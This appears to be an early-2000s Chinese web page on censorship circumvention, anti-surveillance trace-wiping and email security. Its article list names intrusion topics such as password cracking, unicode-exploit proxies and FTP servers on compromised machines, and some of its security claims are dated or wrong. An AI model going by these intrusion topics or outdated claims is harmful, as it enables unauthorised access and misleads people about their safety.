飞梭网－网络安全

 |  | 飞梭镜象站
破网技术网站推荐 | 心清似玉 | 轻舟网
 | 代理看世界 | 新人类社区

飞梭网助你安全地畅游网络

利用家中电脑建立多个网站和FTP指南

通过CGIProxy建立基于Web的安全匿名代理服务器

匿名邮件群发之实战

个人网络安全

利用unicode漏洞，轻松建立自己的代理服务器

关于网络安全的十点说明

关于上网安全的若干问题

电子邮件安全手册

“网吧管理专家”密码破解

斩杀间谍精要--必备的三种免费利器

网络安全的基础常识介绍

在网吧上网的一些安全问题

安全使用电脑的几点意见

突破网吧对系统屏蔽的几点 经验总结

关于电脑安全问题的深入探讨

全面清剿网络间谍檄文之一-间谍杀手

代理服务器的基本概念和一些相关技巧

提升unicode权限，安装代理跳板

代理服务器的几个误区

完全跳板安装手册

网站浏览安全细细谈

全方位防止电脑泄密

网吧上网敲破美萍安全卫士

NetBIOS 端口的安全问题及补救方法

自动清除文件的简易方法和补充

使用netstat(tc)命令检查接口,IP, 是否被安装了木马程序

防范网络监听

so cksCap+socks2http运用

代理服务器之三重跳转

代理猎手的妙用

在肉鸡上安装ftp服务器

防范网络追踪

防范间谍软件

临时文件不留痕迹

关于清除计算机记录的重要补充

匿名邮件转发器

如何编辑ISP帐号的详细信息

txt文件欺骗及防范方法

浏览网页也会感染木马

个人上网用户自我防护手册


飞梭网助你畅游网络

畅游网络绝招 总述：破网利剑首推SSSO，其次排名为金刚钻(Jap+sgtb)，冲浪网，自由网,傻瓜跳板,代理看世界，花园软件,动态网...它们的最新版本都可安全访问任何被封锁的网页。
软件 | 简介
SSSO | ssso是Stunnel＋SkSockServer＋SocksCap＋OpenSSL的缩写，一款安全性目前最高的破网工具，集合了数种不同的程序使原本纷乱的配置变得井然有序，复杂的安装过程对菜鸟来讲也不过举手之劳。
冲浪网 | 安全可靠，信息传输全过程加密。资料缓存使经常访问后的网站访问速度大大提高。使用本软件能帮您匿名(传输过程加密)畅游国外所有网站，独特的加速功能使浏览速度大大加快，超过使用任何代理网关，100%绿色软件,可从软盘启动，浏览不留痕迹，软件可以在开机时自动加载、关机前自动进行清除。本地url不是明文，可以在有本地ie监控器的网吧里面使用。
金刚钻 | ＝Jap+傻瓜跳板
freenet | 自&由&网(freenet)是一个正在开发完善的免费公开软件，一般的PC或UNIX电脑只要支持JAVA都能运行，其开发宗旨是为了保障言论自由、突破网上信息封锁。在目前的形势下，自由网可以让广大读者有效地避开一些机构的控制，同时保障文章的作者和读者的身份。Freenet风靡西方，并被誉为互联网时代最伟大的自由软件，它突破了互联网原有的限制，而充分的挖掘了互联网潜在的共享优势。1、你可以通过freenet匿名发送任何资料。2、你可以匿名浏览、下载任何信息。3、完全的保护你的隐私
代理跳板 | 代理跳板由snake编写，软件虽然不大，但功能可不小。不但可以浏览网页，还可以使用QQ、ICQ等聊天工具、网络蚂蚁等下载工具，支持realplay在线视听工具等，甚至有的一些ftp工具都可以利用它上传主页呢！如果你要有一个好的跳板，速度绝对比代理服务器快（代理服务器是众人用的，而一个自己找的好跳板就你一个人用）。代理跳板是动态加密的，每一次传递数据的加密方式都不同！
FreeSurf | 代理看世界主页https://uw.slyip.com 程序小巧，170多k。
JAP | JavaAnonProxy提供了在Internet上进行匿名和保密访问信息的手段。为每个人提供了易于使用而且开放源代码的软件。JAP保护你的隐私并隐藏你浏览Internet的纪录。现存的大多数匿名访问系统在安全性方面不能达到较高的有效性。它能提供强大的匿名服务，即系统经过所谓的交通分析。这意味着，任何一个企图窃听网络通讯或连接的对手，都得不到任何正在交流的信息，以及谁跟谁进行的交流。虽然JAP的安全性比自由网差一些，但JAP仍然是目前最为好用的匿名访问软件之一。所有信息在通过JAP的每个节点时都经过了动态加密，但JAP仅仅提供Http代理，速度不一定很快，但JAP较稳定，在访问论坛时，JAP具有更大的优势，可以发送内容较多的贴子。
Garden | 1、所有的网上的传输都是加密通讯。这样网管也不知道你在访问哪里。2、不在硬盘存放Garden专用的数据文件－当然IE的临时文件很难避免，需要手动清除。3、避开有些网吧管理软件在浏览器中实现对某些特定域名的监视。当然这只是一种不是很完善的技术手段，并不能解决所有的监视问题。使用域名转换功能时也要小心，比如使用说明中提到的返回的页面中的绝对域名不会被转换的问题。
动态网 | 采用动态IP技术，突破网络封锁。 当前域名1，当前域名2，当前域名3，当前IP1，当前IP2，当前IP3 动态网订阅信箱1，订阅信箱2，订阅信箱3，让您每天收到最新的IP。
Sockscap32 | 好东西
e-Border | 被NEC称为“完整的Socks解决方案”的e-Border系统客户端部分。
MultiProxy | 可以同时连接多个代理服务器
半遮面 | 由网侠派开发的一种基于浏览器技术的隐写术应用软件，于7月13日发布。是为非技术性用户着想而设计的，只需一点，《半遮面》的加密处理在英特网上几秒钟内提供被禁止的内容。运用 LSB steganographic 技术和AES-256 位加密，它使用户与他们的朋友分享掩藏在看上去象普通的图像中的被监控的信息，是唯一的一种用隐写术工具在英特网上自动地扫描并把解了码的内容传给用户，它是独立的基于IE的浏览器，在用户的系统上不留任何痕迹。作为一个安全措施，内置防止恶意HTML的安全选项。
■Peekabooty，可以一试。Peekabooty是牛教最新推出的和自由网一样的P2P程序，可以避开所 有的网络监控，让你自由自在的在互联网上冲浪，是今后的发展方向。 ■SafeWeb “Triangle Boy”--好像已经终止服务了。没有国外的节点，国内根本无法用。 ■Jproxychain和自助冲浪－－申请非常困难,虽然可行不推荐。
重要说明 | 以上软件心清似玉 轻舟网 等均有下载，不过一定要用SSL代理才可进入哦，也可点击这儿给我留言，我会告诉你如何下载。


安全使用电脑的几点意见

如何使Windows98 开始菜单中"文档"栏失效

每次打开一些文档后，在98"开始" --"文档"中，都有记录。尤其在公用机器上，别人可以看到你都看了哪些东西，甚至可以看其详细内容。 虽可点击任务栏，通过"属性"项删除，但需每次消除，比较麻烦，且常常易忘记。 一个更好的办法就是：让"文档"记录不工作。

办法：
1. 打开注册表编辑器。
点"开始"---"运行"，在弹出的对话框中键入"regedit".

2. 左键依次点击，进入
HKEY_CURRENT_USER \ Software\ Microsoft\ Windows\
Current Version\ Polices\ Explorer 主键

3. 在右面的框中空白处，点右键，再点弹出的"新建"按钮。接下来选"DWORD值"，键入"NoRecentDocsHistory",（注意大小写不能错）。回车后，就已新建了一个DWORD键值。

4.右键单击该键名称，在弹出的选项中选"修改"。在"键值"栏键入"1".
然后重启机器即可。

将来想要让文档恢复记录， 可用同样方法进入"修改"，将键值改为 "0" 即可。

摘自"电脑爱好者" 15期 （2000年）。

网吧收发邮件要小心

收发电子邮件是目前中国人上网最主要的目的之一，对于家里没有电脑的人来说，去网吧收发电子邮件是再方便不过的了。但你知不知道，你看过和发过的邮件，其他人也能非常容易就看到。

我们浏览过的网页都会被下载到硬盘上，其他人不需要什么破解程序，只要利用IE浏览器的某些功能就能看到你浏览过的网页、收到和发送过的邮件，有的甚至还能看到你的用户名和密码等，个人隐私就这么轻易地被暴露了。

那么是不是就不能在网吧收发邮件呢？ 也不是，只要我们每次把保存在硬盘里的网页删掉就行了； 有的网吧装有网吧管理器，把工具菜单给锁住了，不能直接删除硬盘里的文件，这时可以先把浏览器设置成脱机状态，点击浏览器里的历史记录项，在左边弹出的历史记录窗口里选"今天"选项， 再点右键选择删除，这样历史记录就被删掉了； 有的网吧管理器把历史记录菜单也锁住了，您可以先点击查看菜单，选浏览器栏，历史记录项，这样又会弹出历史记录窗口。

（摘自相关报纸）

网吧安全的几点经验：

心态稳、正是最根本的。然后就是技术问题，以下是几点小办法：

1、发电子邮件时在将要离开时发出。

一切技术上的东西都不能说绝对安全，你有能力用，人家慢慢也会有能力破。所以尽量宜采用“绝后计”，不留任何出事的可能。
到网吧先做其他工作，将要走时将邮件发出，（或做其它风险稍大的工作）。即使对方反查，查到时也早已是人去楼空。

2、多个网吧轮流去。

在一个网吧做过事后，一段时间内不要再去。目前大城市里网吧林立，多找几个地方轮换并不费太大事。 这样同一网吧再去时，往往是半个月、甚至一个月以后的事了，那时谁也记不得你了。

3、窗口调整

看订阅的××等内容时，可将浏览器窗口拖小到只有一两行字的宽度。这样别人走过时一般看不清内容，也不显眼。 加上再打开一个内容为聊天网站的新窗口，（将其最大化），就非常方便了。

现场写信时也要如此。否则一大片文字在屏幕上，又都是敏感字眼，是很显眼的。

4、记住删除该删的内容。 方法上文有论述，但常常易忘记。

另：家里有机器可将要发送的内容做附件放到网上的邮箱中，再到网吧发出。也就是说，不要用家里的机器直接向明慧发信。即或你觉得自己技高一筹，也不如在网吧发稳当。凡事不留尾巴，断绝出事的可能总是更好些。


关于电脑安全问题的深入探讨
    安全问题一直以来都是一个很严肃的问题，但现在是网络病毒、木马横行的年代，稍不留意就可能中标，带来意想不到的损失，因此网上并无绝对安全！我借此机会提供一下个人经验：机器安全和上网工具安全。

    一、机器安全问题：

    1、上网前应扫描一下自己的端口开放或用MS的netstat -a看本地机的端口开放进程。在没有运行任何网络软件（像浏览器、邮件、QQ等等），运行MS的netstat -a命令，WINDOWS98操作系统会看到只有137,138,139端口是开放的，WINDOWS 2000或NT看到的是135，137，138（可能，笔者没用过2000和NT）。可是135或139可以说是一个后门，是网络共享的常用端口。如果这两个端口是开放的，那么现在有一些黑客工具就是针对这两个端口进行入侵。这类工具我知道有几个。解决办法见《NetBIOS 端口的安全问题及补救方法》一文。如果没有运行任何软件，运行MS的netstat -a出现除以上三个端口外还有其他的端口就要注意了。很可能有木马程序在运行。想解决此问题可参照《网络木马防御战略》。（建意：了解一些常用木马的端口号）。还有系统的本身漏洞端口号如（sql的1433端口，3398终端服务等)。
    2、加载一些防病毒的防火墙和防黑客的防火墙! 注意病毒防火墙应及时更新升级。但防火墙像天网有很严重的问题，有一些木马专门针对天网的，像广外女生等，黑洞也能使天网的进程杀掉，而自己的机器也没什么反映。还有其他的。建议采用其他防火墙！就是因为天网是中文的，一些人出于不可告人的动机，制造了这些东西！
    还有像金山毒霸防火墙也是中文的，对于广外女生是查不出的！建议不要使用此防火墙，还有这个防火墙占有内存太大，实在让人受不了。还有现在出现了可以放木马的主页，浏览网页会中木马！放木马的主页我在电脑报上看过，木马的代码是用BASE64什么什么语言编的。浏览主页时，有ACTIVE是，选否。防火墙是没有警告的。还有最近看了一些网站都在报导浏览网页会中木马！防止的方法中有个简单的，就是在你的设置里，把下载文件改为禁止就行了！防火墙是没有警告的。像万花谷病毒也能自动修改注册表，防治的办法是加个注册表保护程序！可到金山毒霸主页去下载。防火墙是没有警告的。
    3、在IE的Internet选项中"安全"标签下选"自定义级别"将一些选项禁用。 (Activex在恶性代码中它可是起了核心作用。比如看网页中格式你的硬盘、还有JAVA等。
    4、关闭资源共享及其端口135（WIN NT OR WIN2000）或139(WIN 98)）。
    5、现在有没有针对80端口入侵的，我不清楚，但在一些论坛有讨论的！随时更新ie或微软的补丁。
    6、关闭ie设制中的下载，可避免一些隐藏自动下载的木马，病毒等。
    关于木马的详细问题，请看《木马防御全攻略》。我还碰到过域名劫持的问题，是国外的域名，有的时候访问却进了国内的网页！莫名其妙！
    除了这些机器本身的安全外，想浏览国外的网站，那么软件本身的安全性也需要解决。下面详细介绍破网软件的安全。

    二、工具安全问题

    近来由于国内各地纷纷采用强制缓存器，缓存器是用来储存国内与国外一切信息的中介。在缓存器中都有备份。国内发出的命令请求必经缓存器处理。这样在缓存器中加个过滤软件，把各种请求进行处理分析。如果是正常请求，缓存器就进行正常处理。如：在缓存器内有要访问的内容，就把缓存器内容发给请求的用户。缓存器没有所要的内容，缓存器本身就把请求发给所要访问的主页，然后在把所要访问的主页的内容转给用户。这就是采用一般的代理软件或一级代理不能访问的原因，也就是把域名或IP屏蔽！如果是未加密的信息包括网站地址和网页内容，可能会把缓存器的备份拿去进行内容过滤，找出对自己有用的信息，这样也暴露了用户的隐私内容，这些是每隔一段时间进行的。
    对一些加密的二级代理来说，网页内容是加密的，地址也是加密，缓存器是无法识别的，则是采用直接找到IP地址，把IP地址屏蔽。对不同情况可能策略不同。对于一般的代理是cgi或java编写的,地址也很容易被缓存器的过滤软件发现,发现后屏蔽就成了。
    面对黑客工具的破网工具，缓存器就不管用了。因为一切都是加密的，又不太容易阻挡和用户相连接的服务器地址。但通过反汇编技术分析软件的工作机理，可以找到蛛丝马迹，那就要看谁的火候大了！哈哈！
    如果使用的加密不是128位，或采用一般加密方式，这种情况可能会被解密！
    如果不是随机加密，每一次对不同的地址加密方式相同，就可能找到含有地址特征的字符串，进行模糊过滤。不希望这两种情况发生。
    如果自己已被盯上了或可能被盯上了，通过分析您的上网记录，还是能知道使用什么工具的，具体访问哪里可能不知道。这种情况，我想除自由网外其它软件就不要用了。

    下面是各种软件安全技术分析

    1、自由网　目前，安全性最好的应是自由网，采用独特的p2p技术，所有数据全部加密！不像其他工具本身是有本机对端的ip地址可被暴露！由于使用人数太少，目前不能单独使用！现在可以在sockscap32上使用！自由网本身还有一个下载命令（getnews），用这个命令下载比在线浏览更加安全。自由网本身也支持网际快车(flashget),网际快车可到华军软件园下载。网际快车是断点续传软件，任意任务可分5部分下载，可提高安全性。
    万众期待的自由网5.0将拥有你想象不到的功能！
    (1)FwProxy可以当作普通的浏览器Proxy使用；
    (2)自由网协议经过改造后性能更佳；
    (3)自由BBS将有易于使用的图形界面；
    (4)建立自己的自由网站更快捷方便。

    2、自由鸟　大家知道自由鸟这个软件的代理列表是不能由用户自己更新的，这些代理的地址是固定，很容易被屏蔽。现在提供的代理列表是无法使用的，这些代理可能被屏蔽了。一旦这个代理被屏蔽，则这个用户的ip就会被记录，谁使用就是很清楚了。我在本地看到这个软件的端口或其他的使用都很巧妙，和外面连接的端口也在变化，但代理服务器的端口不变(14000)。
    freebird的公司出了一个新的工具，软件名叫：Cosmodia Proxy Checker
    地址：http://www.photono-software.de/prod_cp.php3?prod=1，不过要给14.90美元才可以下载！我有想付钱的想法，在国内只能通过邮局，但我不想在邮局那留下黑名单，没办法，也不想老去破解。
    如果自由鸟和sockscap或socks公司的另一个软件（软件名字忘了），通过socks协议转换一下，仍可通过封锁。也可加上二级代理或加密代理，或者使用三角男孩的ip，这回安全就彻底没问题了！

    3、SA2.6　这可是个很好的工具，自己可以更换代理列表，通过的数据和地址都是加密的。SA2.6使用说明：
    界面有三个菜单(file, proxy-engine和help)，file|registration info(再线注册)|unlock trial vers－ion(解密版)|load skin(装如界面的背景什么的,没什么用)|exit(退出)proxy-engine|view/edit/check(是有关代理的察看，编辑和检测)|get latest　proxy(更新代理列表)|seting(设置)|cookie ctrol(一个cookie控制)view/edit/check|file|edit|chcckfile中|load proxy list(装入代理列表)|save proxy list(将代理列表存盘)|close windows(关闭窗口) 。
    由于此软件代理列表格式(*.bat)和代理猎手格式(*.txt)不同，需将一般格式的":"通过word软件的察看(view)--->替换---->高级的制表符"^t"，将结果存入扩展名bat的文件中。也可把此软件文件夹的cookieruler.bat改名后，存入改名后的文件里。
    edit|select all:选择全部|select untested :选择未检测的|add new proxy entry:加入代理|edit newproxy entry:编辑代理|del new proxy entry:删除代理（edit/del new proxy entry必须是选定代理后才可以。）|check check selected:检测选定的代理|check all:检测所有的|proxy list:是代理列表|checkinglog 检测记录 在proxy list看到打对号的是可用的代理，打叉是不可用的代理。setting：|connection:连接|option:选项|filewall/proxy:防火墙或代理|securiity rules:安全规则|expert:专家项|connect: modem 拨号上网,选此项。
    太麻烦了!不说那些不能用的部份了。看看专家项:在服务器的选择上有四项。
    |第一个:是随机服务器。
    |第二个:是响应在多少秒以下的,后面是添入秒数。
    |第三项:是只用固定的服务器，后面添入ip和端口。
    |第四项：连接最快的服务器。
    使用只需把代理列表添入，然后再在界面中的选项中选super stealth项。只有super stealth项是加密的。还有代理最好添入几百个，以免出现自动转换成一般代理模式。其他默认即可。也可和sockscap32配合使用。

    4、jap　jap是采用匿名服务器作为中介传输。运行时是本机和匿名服务器进行加密传输。其实是个P2P软件，但匿名服务器过于暴露，而且又极其少，这种匿名服务器又不同与其他的一般的匿名代理服务器，很难找到。在本机用NETSTATE -AN可以看到，只有一个地址。虽然HTTP-PROXY好像也只是提供一般的代理与匿名服务器。如果把匿名代理服务器的IP阻挡，那么使用HTTP-PROXY也是无法通过缓存器的。缓存器就会记录所使用该软件的用户资料。唯一的办法就是不断的更新匿名代理服务器，那就和三角男孩的结果差不多。现在，可到JAP软件公司下载有个更换匿名服务器的补丁，里面含有匿名服务器。 现在和SOCKSCAP32使用,看看如何。

    5、三角男孩　三角男孩是Safeweb的节点服务器，目前也是最好的工具之一，强烈推荐。但只有服务器版本。有LINUX和NT或2000的版本，可考虑安装此软件。可到其主页处下载。该软件采用P2P和128位数据加密。128位加密目前无法破解。

    6、代理跳板　数据和地址是加密，但如果自己不能通过黑客工具建立跳板，那么安全问题就很难保证。如果别人给的跳板是不是也被其他人监控了？！如果在公开场合或不信任的人给的跳板，那更容易被监控，也容意此跳板IP封锁。如果被监控那么可能就有被秘密调查的危险。切忌!

    7、unfrozen　是一个转换ip工具。该软件本身有bug，转换出的地址不对。其主页http://yoda.w3.to。还有，这个软件千万不要单独使用。freebird、sa、jap也没必要和它一起使用。因为freebird、sa、jap这三个软件本身是对ip进行加密处理，封锁也是对固定的匿名服务器封锁。
    我觉得可以对加密代理或三角男孩的ip地址进行处理。那样缓存器那里就好办了。

下面介绍一下手工转换,

    域名 www.va.gov　 ip---->转换dword:　 开始---->程序---->附件---->计算器
    把如：210.109.037.111----------->16进制(oxd2.ox6d.ox25.ox5f),ox是16进制符号。
           |　　|　 |　|__ox5f
           |　　|　 |________0x25
|　　|_________________0x6d
|________________________0xd2
    再把d26d255f(16进制)---->3530368351(十进制)。也可转换成其他如8进制，4进制等等，可到其主页看看。

    8、结合使用　使用sockscap+代理软件(如:代理猎手，mproxy等)，用socks代理躲过缓存器，代理列表中也不用添加特别端口的代理，一般即可。这样就制造出一个匿名加密代理。国外的软件也可，不过增加了对软件的分析难度！也可用蚂蚁或快车下载更好。
    如果加上加密代理或三角男孩,安全就不会再有问题了!

    结语：现在突破封锁无一不是采用加密技术，对ip和数据加密。自由网是最好的，缓存器无任何可以记录。如果采用匿名服务器形式，这个匿名服务易暴露，也易成封锁对象的。一旦匿名服务器被暴露，用户也同时被暴露了。有特殊要求的人，请谨慎使用！如果使用的人很多，就很好办了！
    还有，sockcap32或socks公司的另一个软件也可以。但毕竟socks代理太少。也易成为封锁目标。还有一种anonymous cookie据说可以隐藏电话号码，可在汉化的网站找到。
    现在唯有期望自由网早点升级和死牛的软件出世。没办法，很多事情没出现时，知道有问题，又不能写出来，只能充当事后诸葛亮的角色。


关于清除计算机记录的重要补充
关于清除计算机记录的重要补充 2001年10月28日 星期日

大陆一些朋友因为自己的计算机上留有上网的痕迹，被查出拘捕，很是遗憾。 近来有很多文章讲了清除计算机上各种操作痕迹，保护个人隐私权的文章。笔者发现有2条为大家所忽略，这2条即使使用流行的『删除软件』，也删不掉。

# 1　Windows下的隐藏目录【Recent】
它列有本机打开的所有文件，全部文章、图画、媒体音像、Realplayer等所有的近期的文件。删掉Windows左下角『开始』菜单中『文档』中的10个文件，【Recent】中还有确切的保留（几十个），而删净【Recent】中内容，上述『文档』中的文件即可变为0。就是说，【Recent】是根源。

现在一些软件如『超级兔子魔法设置』Super Rabbit Magic Set，没有删【Recent】的功能，切勿用了超级兔子就“大意失荆州”，必须手工删除【recent】,方法:
在『Windows资源管理器』或『我的电脑』下，打开顶上的『查看』选项，点『文件夹选项』，在『隐藏文件』中选点『显示所有文件』，【Recent】自然出现，删除全部内容。

# 2　Word、Excel、Powerpoint、Realplayer、Acrobat Reader、Winzip、Windows的写字板、书写器等的打开路径
这些界面左上角『文件』菜单点击，即会出现近期的4篇打开的文章，
『超级兔子』对Word等前5种软件无能为力，必须手工删除。

以Word为例：如是公用微机，只好打开4篇无关文章，冲掉原记录。如果可以改动，则进入『工具』菜单，点『选项』后，点『常规』，『常规』中有【列出最近所用文件[ 4 ] 个】，将4改为0即可。但是Realplayer要求至少选[1]，所以只好在听看音像资料后，打开一个其它Real文件，冲掉记录。Winzip、写字板只能打开4个文件冲掉痕迹。

# 3. 超级兔子等软件，盗版的一般删不净，（如【Windows\history】、office下的【Recent】删不掉），正版的也要仔细检查它的删除功能。
本文对昨日《关于清除计算机记录的重要补充》，续补一个重要问题，也是用一般流行的『删除软件』删不掉的记录。

＃ 4、Office下的隐藏目录【Recent】
它列有office打开的所有文件和文件夹，更加隐蔽，删净【Windows\Recent】,office中还有确切的保留（几十个）.它的目录很深，一般在【Windows\Application Data\Microsoft\Office\Recent】，删净这一【Recent】的全部内容即可。

随后，还要用『查找』工具，查一下计算机上所有的【Recent】子目录，因为有时office未安在Windows下，有时还有其它功能强大的【Recent】，查到后，一并删净其全部内容，如此，任何痕迹皆无，记录可保无忧。

** 总结以前的，还是选用好的删除软件比较方便，在其中【清除垃圾】一项，可删掉几乎所有操作痕迹。用完后，一定手工删除【windows \ Recent】，手工清除Word、Realplayer等文件记录，复查【history】。『超级兔子』，可以买到或在www.Superr.net 上下载（1.8M）。

如果手工删除，则要：
1、在Windows下删净5个目录的内容
【cookie】、【History】、【Recent】、【Temporary Internet Files】、
【temp中尾缀为 .tmp的】的所有文件，这样所有上网记录、文件记录都被删净了（『Cookie』中index.dat删也删不掉，不用管）。
2、删除Word、写字板、Excel、Realplayer等的文件打开路径。
3、删除Winzip等的文件打开路径（打开4个无关zip文件，『展开路径』指向别出！冲掉记录）。
4、删净office的【Recent】
一般在【Windows\Application Data\Microsoft\Office\Recent】，删净这一【Recent】的全部内容即可。随后，还要用『查找』工具，查一下计算机上所有的【Recent】子目录，查到后，一并删净其全部内容，如此，任何痕迹皆无。

目前，大陆在清查电脑上很下功夫，密码12位以上，杂符字母混排才有所保障，
如果加上流行的高级加密软件保存文件，自可安心工作了。


电子邮件安全手册

电子邮件已经成为企业商业及人际交往最重要的交流工具之一了，所以很多黑客也把攻 击目标盯上了电子邮件。针对电子邮件的攻击分为二种，一种是直接对电子邮件的攻 击，如窃取电子邮件密码，截取发送邮件内容，发送邮件炸弹；另一种是间接对电子邮 件的攻击，如通过邮件传输病毒木马。

产生电子邮件安全隐患主要有三个方面：一是电子邮件传送协议自身的先天安全隐患， 众所周知，电子邮件传输采用的是SMTP(Simple Mail Transfer Protocol)协议，即简 单邮件传输协议，它传输的数据没有经过任何加密，只要攻击者在其传输途中把它截获 即可知道内容；二是邮件接收客户端软件的设计缺陷导致的，如微软的OutLook曾存在 安全陷患可以使攻击编制一定代码让木马或者病毒自动运行；三是用户人个的原因导致 的安全隐患，如在网吧、学校等共公场所上网把电子邮件的密码保存在上面，或者随意 打开一些来历不明的文件。

一、电子邮件易被截获

电子邮件作为一种网络应用服务,采用的是简单邮件传输协议SMTP (Simple Mail Transfer Protocol)。传统的电子邮件基于文本格式,对于非文本格式的二进制数据,比 如可执行程序,首先需要通过一些编码程序,像U-NIX系统命令uuencode,将这些二进制数 据转换为文本格式,然后夹带在电子邮件的正文部分。随着网络应用的不断发展,大量多 媒体数据,如图形、音频、视频数据可能需要通过电子邮件传输。Internet采用"类型/ 编码"格式的多目的互联网络邮件扩展MIME (Multipurpose Internet Mail Extensions)标准来标识和编码这些多媒体数据。

这些传输的数据如果在传送中途被截获，把这些数据包按顺序可以重新还原成为你发送 的原始文件。

由于电子邮件的发送是要通过不同的路由器进行转发，直到到达电子邮件最终接收主 机，攻击者可以在电子邮件数据包经过这些路由器的时候把它们截取下来，这些都是我 们所不能发现的。我们发送完电子邮件后，我们就不知道它会通过那些路由器最终到达 主机，我们也无法确定，在经过这些路由器的时候，是否有人把它截获下来，就像我们 去邮局寄信，我们从无知道寄出去的信会经过那些邮局转发，那些人会接触到这封信。

我们使用电子邮件就像我们在邮局发送一封没有粘封的信一样不安全。

从技术上看，没有任何方法能够阻止攻击者截取电子邮件数据包，你不可能确定你的邮 件将会经过那些路由器，你也不能确定经过这些路由器会发生什么，你也无从知道电子 邮件发送出去后在传输过程中会发生什么。

也就是说，没有任何办法可以阻止攻击者截获需要在网络上传输的数据包。

那么，唯一一种办法是让攻击者截获了数据包但无法阅读它，这就像以前的军事无线电 报一样，在发送无线电波传输电报时，人们不知道它们是否会被敌方截获，于是人们对 电报的内容先进行加密处理，这样即使敌方截取到了电报，得到的也只是一大串毫无意 义无序排列的字符，而有正确密码对发送电报内容进行解密处理，才能得阅读到原本的 内容。

即和发送电报一样，在发送电子邮件前对其进行数字加密处理，在接收方接到电子邮件 对其数字解密处理，这样，即使攻击者截获了电子邮件，在他没有密码对截获的信息进 行解密的情况下，只是一堆没有任何意义的乱码数据。

二、对电子邮件安全加密

加密，是一种限制对网络上传输数据的访问权的技术。原始数据（也称为明文， plaintext)被加密设备(硬件或软件)和密钥加密而产生的经过编码的数据称为密文 （ciphertext）。将密文还原为原始明文的过程称为解密，它是加密的反向处理，但解 密者必须利用相同类型的加密设备和密钥对密文进行解密。

加密的基本功能包括:

防止不速之客查看机密的数据文件； 防止机密数据被泄露或篡改； 防止特权用户(如系统管理员)查看私人数据文件； 使入侵者不能轻易地查找一个系统的文件。

至于加密原理我们不再这里详述，在以后的专题里我们可能会做详尽的说明，总 之来说，对电子邮件加密就是为了阻止别人在截获了你的电子邮件之后不能正确读出你 的内容，对电子邮件加密可以有两种方式：一是通过专门的机构发放的数字证书对邮件 进行加密，数字证书可以实现加密、认证身份、保证邮件不被修改等功能，目前国内有 南方电子商务认证中心提供数字认证服务；二是通过专门的加密邮件发送软件对发送邮 件进行加密，即PRG技术。

三、防御电子邮件炸弹

现在互联网上有很多发送电子邮件炸弹的软件，事实上，自己编制这类软件也不难，它 主要原理是重复发送邮件到某一邮箱，可以伪造邮件发送地址，伪造邮件发送IP地址， 伪造发送人和发送邮件服务器。

当有人得知你的电子邮件地址即可发送大量无用的垃圾邮件给你，他只要输入一串数字 和你的电子邮件地址，按发送按钮即可让你明天早起来发现自己电子邮箱里存在数千甚 至数万信，你正常的邮件就根本无法从里如此众多的邮件里面过滤出来，甚至你的邮箱 可能被如此众多的电子邮件给挤爆了，这样，别人发给你的正常信件就再也发送不进来 了。

电子邮件采用的协议确实十分不妥，从目前来说，在技术上也是没有任何办法防止攻击 者给你发送大量的电子邮件炸弹，只要你的邮箱允许别人给你发邮件，攻击者即可做简 单重复的循环发送邮件程序把你的邮箱灌满。当然，你会说，我如果设置邮箱过滤就不 会出现这种情况，但是要知道，攻击者是可以伪造邮件发送地址的，你总不可能把所有 二十六个字母和十个数字的组合都过滤掉吧？

不能直接阻止电子邮件炸弹，所以我们在受到电子邮件炸弹攻击后，只能做一件事，如 果在不影响信箱内正常邮件的前提下，把这些大量的垃圾电子方便快捷的清除掉，我们 在相关参考文章里为您提供了一些清除电子邮件炸弹的方法。

四、防御电子邮件病毒

电子邮件是传播病毒最常用的途径之一，很多著名的病毒都是通过电子邮件来传输的， 如造成全球经济损失十几个亿美元的爱虫病毒。

电子邮件传播病毒通常是把自己作为附件发送给被攻击者，如果接受到该邮件的用户不 小心打开了附件，病毒即会感染你的机器，并且现在大多数电子邮件病毒往往在感染你 的机器之后，会自动打开你Outlook的地址薄，然后把自己发送给你地址薄上的每一个 电子邮箱中，这正是电子邮件病毒能够一下子大面积传播的原因所在。

另外由于电子邮件客户端程序的一些Bug也可能被攻击者利用传播电子邮件病毒，微软 的Outlook曾经就因为两个漏洞可以被攻击者编制特制的代码，使接受到邮件的用户不 需要打开附件即可自动运行病毒文件。

防御电子邮件病毒的方法和木马一样，不要随便打开那些不明的可执行文件，即使是熟 人寄来的，也要问清楚之后才打开，因为一些电子邮件病毒是会自动伪装成你朋友的电 子邮件发送给你。另外及时注意电子邮件客户端程序的漏洞更新，由于Outlook一直以 来都是黑客们照顾的重点，并且Outlook也经常出现较大的安全漏洞，我们建议不要使 用Outlook做为电子邮件客户端程序。

五、公共场所电子邮件安全

人们很多时候需要在诸如网吧、学校公共机房、单位等公共场所接收发送电子邮件，由 于其它人都有机会接触你接收发送电子邮件的机器，这样电子邮件很容易被别人偷看， 可能这些邮件里面有你很重要的一些信息。

所以我们特别提出公共场所电子邮件安全的注意事项，我们在公共场所接收/发送电子 邮件是应该注意：

1、如果使用电子邮件客户端程序发送/接收电子邮件，如Outlook、Foxmail，请务必对 邮箱进行加密，否则别人可以直接查看你接收和发送出去的电子邮件，可能这些邮件涉 及到你个人隐私，即使是不涉及个人隐私，有人查看你的信件，总归是一件不高兴的事 情。或者你在查阅邮件后直接把邮件彻底删除，注意，是彻底删除，即也要从垃圾箱里 面清除掉被删除邮件，这样别人才查阅不到你的邮件。

2、如果你的电子邮件服务提供商提供Web方式接收/发送电子邮件，我们强烈推荐你采 用这种方式在公共机房处理电子邮件，因为公共机房往往是在一个局域网环境，使用客 户端程序接收/发送电子邮件很容量被别人截获数据包而获得你的密码。而Web则不同， 它的数据包不是纯文本的。

3、在Web方式下接收/发送电子邮件后，在你关闭计算机离开前，请务必把浏览器缓存 文件Cache删除掉，否则，别人可以通过调用浏览器的缓存来查看你用Web浏览器浏览的 信件内容。


防范间谍软件

防范间谍软件

我们使用绝大多数软件是共享软件和免费软件，在这些软件中有可能会被置入一些广告，多数广告都会在磁盘上偷偷安装一些代码，因此成为间谍程序！它会帮助广告商收集用户信息，例如户点击广告情况、下载什么软件、喜欢用什么软件、上网习惯、邮件帐号等等！所有一切都在不知情的情况下做的，也不知道都收集了

什么信息。

清除间谍程序的软件Ad-aware。Ad-aware能够搜索出我们硬盘中有哪些间谍程序，能从内存、注册表和磁盘中把它们彻底清除。 软件的使用方法如下：

在主界面上按下“Scan my system”按钮，系统会按照设定方式进行搜索，结果将以列表形式给出。如果设置扩展搜索和搜索磁盘，Ad-aware不仅能搜出间谍程

序，还能搜出不安全Cookie。对于搜索结果，可以选中前面的复选框，然后按下“Continue”按钮将之删除。

